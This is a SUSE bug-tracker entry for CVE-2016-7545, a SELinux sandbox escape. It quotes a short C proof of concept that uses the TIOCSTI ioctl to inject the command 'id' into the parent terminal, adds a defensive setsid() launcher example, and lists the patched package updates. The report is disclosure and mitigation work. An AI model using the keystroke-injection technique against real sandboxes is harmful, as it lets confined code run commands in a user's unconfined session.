Bug 1000998 - (CVE-2016-7545) VUL-1: CVE-2016-7545: policycoreutils: nonpriv session can escape to the parent session
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other Other
Importance: P3 - Medium / Normal
Target Milestone: ---
Assigned To: Johannes Segitz
QA Contact: Security Team bot
Whiteboard: CVSSv2:RedHat:CVE-2016-2779:6.8:(AV:N...
Depends on:
Blocks:
Reported: 2016-09-25 22:02 UTC by Mikhail Kasimov
Modified: 2017-12-22 12:32 UTC (History)
CC List: 0 users

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Description Mikhail Kasimov 2016-09-25 22:02:02 UTC
CVE-2016-7545 info: http://seclists.org/oss-sec/2016/q3/606

==========
Hi,

When executing a program via the SELinux sandbox, the nonpriv session
can escape to the parent session by using the TIOCSTI ioctl to push
characters into the terminal's input buffer, allowing an attacker to
escape the sandbox.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
    char *cmd = "id\n";
    while (*cmd)
        ioctl(0, TIOCSTI, cmd++);
    execlp("/bin/id", "id", NULL);
}

$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000
context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
$ id    <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Bug report:
https://bugzilla.redhat.com/show_bug.cgi?id=1378577

Upstream fix:
https://marc.info/?l=selinux&m=147465160112766&w=2
https://marc.info/?l=selinux&m=147466045909969&w=2
https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

Federico Bento.
==========

Red Hat Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=1378577
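Added example (not part of this bug report, of the quoted oss-sec post, or of the policycoreutils fix linked above): a minimal C launcher that shows one mitigation approach for this class of escape, running the confined command in a new session via setsid() so that it has no controlling terminal. The kernel honours TIOCSTI only on a process's own controlling terminal (or for a caller with CAP_SYS_ADMIN), so after setsid() the terminal inherited on fd 0 can no longer be used to push keystrokes into the calling shell. The probe functions, the /bin/sh command and the exit code used here are constructed for this illustration.

```c
/*
 * Added illustration, not code from policycoreutils: run a command in a
 * fresh session (setsid) so the child has no controlling terminal, and
 * probe from inside such a child what that changes.
 */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run `path` with `argv` in a new session. Returns the child's exit status,
 * or -1 if fork/wait failed or the child died from a signal. */
int run_in_new_session(const char *path, char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* A freshly forked child is never a process-group leader, so
         * setsid() succeeds: new session, new process group, no ctty. */
        if (setsid() < 0)
            _exit(126);
        execv(path, argv);
        _exit(127);               /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Convenience wrapper used by main() and the checks below (constructed):
 * run a shell command string through run_in_new_session(). */
int exit_code_in_new_session(const char *shell_cmd)
{
    char *const argv[] = { "sh", "-c", (char *)shell_cmd, NULL };
    return run_in_new_session("/bin/sh", argv);
}

/* Fork a child that calls setsid() and then runs `probe`; return the probe's
 * result (an errno value, 0 meaning "the operation was allowed"). */
static int probe_in_new_session(int (*probe)(void))
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        setsid();
        _exit(probe() & 0xff);    /* errno values fit in an exit code */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Probe 1: can the child still reach a controlling terminal at all?
 * Expected after setsid(): open() fails with ENXIO ("no such device"). */
static int open_ctty_probe(void)
{
    int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd >= 0) {
        close(fd);
        return 0;
    }
    return errno;
}

/* Probe 2: the ioctl from the report, against the inherited fd 0.
 * Expected after setsid(): EPERM (fd 0 is a terminal, but not this
 * session's), ENOTTY (fd 0 is not a terminal), or EIO on kernels where
 * TIOCSTI is disabled. The pushed byte is a NUL, harmless even if the
 * ioctl were accepted (e.g. when run with CAP_SYS_ADMIN). */
static int tiocsti_probe(void)
{
    char ch = '\0';
    if (ioctl(0, TIOCSTI, &ch) == 0)
        return 0;
    return errno;
}

int ctty_errno_after_setsid(void)    { return probe_in_new_session(open_ctty_probe); }
int tiocsti_errno_after_setsid(void) { return probe_in_new_session(tiocsti_probe); }

int main(void)
{
    printf("open(/dev/tty) after setsid(): errno %d (ENXIO is %d)\n",
           ctty_errno_after_setsid(), ENXIO);
    printf("TIOCSTI on fd 0 after setsid(): errno %d (EPERM %d, ENOTTY %d)\n",
           tiocsti_errno_after_setsid(), EPERM, ENOTTY);
    /* Sample confined command: its exit code comes back to the caller. */
    return exit_code_in_new_session("echo running in a new session; exit 0");
}
```

Dropping the controlling terminal closes the TIOCSTI path but does not stop the child from reading or writing the inherited terminal fds themselves; a launcher that also allocates a separate pty for the sandboxed program, or closes the inherited ones, is stronger. Independently of the launcher, Linux 6.2 and later can refuse TIOCSTI system-wide via the dev.tty.legacy_tiocsti sysctl (or by building without CONFIG_LEGACY_TIOCSTI), which is the setting to verify on hosts that run untrusted sessions.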
Comment 1 Swamp Workflow Management 2016-09-26 22:00:13 UTC
bugbot adjusting priority
Comment 2 Johannes Segitz 2016-09-27 09:35:26 UTC
Sandboxing has been broken for a while. Will have a look at this this or next week.
Comment 3 Swamp Workflow Management 2017-01-31 15:08:52 UTC
SUSE-SU-2017:0338-1: An update that fixes one vulnerability is now available.

Category: security (low)
Bug References: 1000998
CVE References: CVE-2016-7545
Sources used:
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    policycoreutils-2.5-6.1
SUSE Linux Enterprise Server 12-SP2 (src):    policycoreutils-2.5-6.1
Comment 4 Swamp Workflow Management 2017-01-31 15:09:18 UTC
SUSE-SU-2017:0339-1: An update that fixes one vulnerability is now available.

Category: security (low)
Bug References: 1000998
CVE References: CVE-2016-7545
Sources used:
SUSE Linux Enterprise Server 11-SP4 (src):    policycoreutils-2.0.79-4.8.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    policycoreutils-2.0.79-4.8.1
Comment 5 Swamp Workflow Management 2017-01-31 15:09:41 UTC
SUSE-SU-2017:0340-1: An update that fixes one vulnerability is now available.

Category: security (low)
Bug References: 1000998
CVE References: CVE-2016-7545
Sources used:
SUSE Linux Enterprise Server 12-SP1 (src):    policycoreutils-2.3-3.3.1
Comment 6 Johannes Segitz 2017-12-22 12:32:57 UTC
fixed